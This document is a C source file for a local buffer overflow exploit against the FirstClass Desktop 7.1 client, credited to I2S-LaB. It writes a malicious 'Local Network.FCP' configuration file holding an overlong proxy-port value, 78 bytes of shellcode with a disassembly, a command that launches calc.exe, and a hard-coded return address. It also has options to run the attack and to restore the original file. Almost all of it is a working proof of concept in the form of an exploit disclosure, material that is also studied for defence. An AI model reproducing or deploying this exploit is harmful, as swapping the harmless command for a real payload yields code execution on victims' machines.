FirstClass Desktop 7.1 buffer overflow Exploit /***********************************************************
++++++++++++++++++++++++++++++++++++++++++++++++++++
####################################################
# FirstClass Desktop 7.1 (latest) buffer overflow exploit #
####################################################
Discovered and coded by I2S-LaB.
URL : http://www.I2S-LaB.com
contact : contact[at]I2S-LaB.com
++++++++++++++++++++++++++++++++++++++++++++++++++++
Compile it with cl.exe (VC++6)
***********************************************************/
#include <windows.h>
void main (int argc, char *argv[])
{
HANDLE FCP;
DWORD NumberOfBytesWritten;
unsigned char *p,
FC_FILE[] = "Local Network.FCP",
PATH[] = "C:\\Program Files\\FirstClass\\Fcp\\",
rawData[] =
/////////////////////////////////////////////////////////////////
// FC file data
/////////////////////////////////////////////////////////////////
"\x43\x4F\x4E\x4E\x54\x59\x50\x45\x20\x3D\x20\x38\x0D\x0A\x46\x43"
"\x50\x45\x4E\x43\x52\x59\x50\x54\x20\x3D\x20\x31\x0D\x0A\x44\x4C"
"\x53\x45\x4E\x44\x20\x3D\x20\x30\x0D\x0A\x44\x4C\x45\x52\x52\x53"
"\x20\x3D\x20\x30\x0D\x0A\x44\x4C\x52\x43\x56\x20\x3D\x20\x30\x0D"
"\x0A\x4D\x44\x4D\x44\x42\x47\x20\x3D\x20\x30\x0D\x0A\x53\x4C\x44"
"\x42\x47\x20\x3D\x20\x30\x0D\x0A\x54\x43\x50\x54\x58\x57\x49\x4E"
"\x20\x3D\x20\x31\x30\x30\x30\x30\x0D\x0A\x54\x43\x50\x52\x58\x42"
"\x55\x46\x20\x3D\x20\x31\x30\x30\x30\x30\x0D\x0A\x54\x43\x50\x52"
"\x45\x4D\x50\x4F\x52\x54\x20\x3D\x20\x35\x31\x30\x0D\x0A\x50\x52"
"\x4F\x58\x59\x50\x4F\x52\x54\x20\x3D\x20\x22"
/////////////////////////////////////////////////////////////////
// MASS NOP LIKE : 'A' = inc ecx
/////////////////////////////////////////////////////////////////
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
/*
* Fcclient Specific shellcode [78 bytes]
*****************************************************************
:00401006 EB47 jmp 0040104F
:00401008 5A pop edx
:00401009 33FF xor edi, edi
:0040100B 8BEC mov ebp, esp
:0040100D 57 push edi
:0040100E 52 push edx
:0040100F 57 push edi
:00401010 6845786563 push 63657845
:00401015 4F dec edi
:00401016 81EFFFA89691 sub edi, 9196A8FF
:0040101C 57 push edi
:0040101D 68454C3332 push 32334C45
:00401022 684B45524E push 4E52454B
:00401027 8D5DE4 lea ebx, dword ptr [ebp-1C]
:0040102A 53 push ebx
:0040102B 33FF xor edi, edi
:0040102D 81EF589D9DFF sub edi, FF9D9D58
:00401033 FF17 call dword ptr [edi]
:00401035 8D5DED lea ebx, dword ptr [ebp-13]
:00401038 53 push ebx
:00401039 50 push eax
:0040103A 6681F75103 xor di, 0351
:0040103F 4F dec edi
:00401040 FF17 call dword ptr [edi]
:00401042 6A01 push 00000001
:00401044 FF75F8 push [ebp-08]
:00401047 FFD0 call eax
:00401049 6683EF4C sub di, 004C
:0040104D FFD7 call edi
:0040104F E8B4FFFFFF call 00401008
**********************************************************
*
*/
"\xEB\x47\x5A\x33\xFF\x8B\xEC\x57\x52\x57\x68\x45\x78\x65\x63\x4F"
"\x81\xEF\xFF\xA8\x96\x91\x57\x68\x45\x4C\x33\x32\x68\x4B\x45\x52"
"\x4E\x8D\x5D\xE4\x53\x33\xFF\x81\xEF\x58\x9D\x9D\xFF\xFF\x17\x8D"
"\x5D\xED\x53\x50\x66\x81\xF7\x51\x03\x4F\xFF\x17\x6A\x01\xFF\x75"
"\xF8\xFF\xD0\x66\x83\xEF\x4C\xFF\xD7\xE8\xB4\xFF\xFF\xFF"
"calc.exe & " // to execute
////////////////////////////////////////////////////////////////
// OTHER DATA
////////////////////////////////////////////////////////////////
"\x22\x0A\x0D\x0A\x50\x52\x4F\x58\x59\x41\x44\x44\x52\x20"
"\x3D\x20\x22\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x45\x45\x45"
"\x45\x44\x44"
/////////////////////////////////////////////////////////////////
// Return Address
/////////////////////////////////////////////////////////////////
"\x5f\x75\xC2\x00";
// Banner
printf ("###############################################\n"
"FirstClass Client local buffer overflow Exploit\n"
"###############################################\n"
"Discovered & coded by I2S-LaB.\n\n"
"URL : http://www.I2S-LaB.com\n"
"MAIL : Contact[at]I2S-LaB.com\n\n");
if ( !argv[1]) argv[1] = FC_FILE;
(argc > 2 ) ? (p = argv[2]) : (p = PATH);
if ( !(SetCurrentDirectory( p ) ) )
{
printf ("cannot set current directory to %s\nexiting.\n", p);
ExitProcess(0);
}
if (!lstrcmpi (argv[1], "/restore") )
printf ("Restore the backup file...%s\n",
CopyFile ("Local Network.BAK", FC_FILE, FALSE) ? "ok" : "Error : backup file not found!\n");
else if ( !lstrcmpi (argv[1], "/run"))
{
printf ("Saving the Local Network file...%s\n",
CopyFile (FC_FILE, "Local Network.BAK", TRUE) ? "ok" : "Backup file cannot be made");
printf ("Opening the Local Network file...");
FCP = CreateFile (FC_FILE, GENERIC_WRITE,
FILE_SHARE_WRITE, NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,NULL);
if (FCP == INVALID_HANDLE_VALUE)
{
printf ("cannot open Local Network file, exiting!\n");
ExitProcess (-1);
}
printf ("ok\nWriting the Local Network File...%s\n",
WriteFile (FCP, rawData, strlen (rawData) + 1, &NumberOfBytesWritten, NULL) ? "ok" : "Write file error!");
}
else printf ("usage : %s /RUN | /RESTORE [path to Local Network.FCP]\n\n"
"/RUN : launch the xploit against \"Local Network.FCP\"\n"
"/RESTORE : Restore the previous \"Local Network.FCP\"\n\n"
"[path to Local Network.FCP] : Optional,\ndefine the path of the \"Local Network.FCP\" to exploit.\n"
"Default is %s\n", argv[0], PATH);
}